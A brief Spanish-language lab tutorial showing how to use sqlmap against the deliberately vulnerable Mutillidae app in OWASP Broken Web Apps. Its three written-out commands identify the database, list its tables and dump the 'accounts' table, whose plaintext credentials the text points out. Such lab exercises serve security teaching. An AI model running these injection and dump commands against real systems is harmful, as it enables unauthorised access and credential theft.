Explotar SQL injection con sqlmap
Usamos el sistema OWASP Broken Web Apps
Usaremos el sitio web
http://192.168.1.109/mutillidae/
Vamos a
OWASP 2013 - A1-Injection(SQL) - SQLi-Extract Data - User Info (SQL)
Ponemos cualquier valor en Name y password
damos clic en View Account Details
Lo que nos interesa es la url
abrimos una terminal y escribimos
sqlmap -u "http://192.168.1.109/mutillidae/index.php?page=user-info.php&username=qwe&password=qwe&user-info-php-submit-button=View+Account+Details" -p username --current-user --current-db
-p nos inica que solo vamos auditar el parametro username
--current-user nos indica que nos muestre el usuario actual
--current-db nos indica que nos muestra la base de datos actual
sqlmap -u "http://192.168.1.109/mutillidae/index.php?page=user-info.php&username=qwe&password=qwe&user-info-php-submit-button=View+Account+Details" -p username -D nowasp --tables
Ahora le pediremos que nos muestre las tablas de la base de datos nowasp
sqlmap -u "http://192.168.1.109/mutillidae/index.php?page=user-info.php&username=qwe&password=qwe&user-info-php-submit-button=View+Account+Details" -p username -D nowasp -T accounts --dump
ahora le pedimos que nos haga un dump de la tabla accounts
Podemos ver que se guardan los usuarios y password en texto plano
Happy Hacking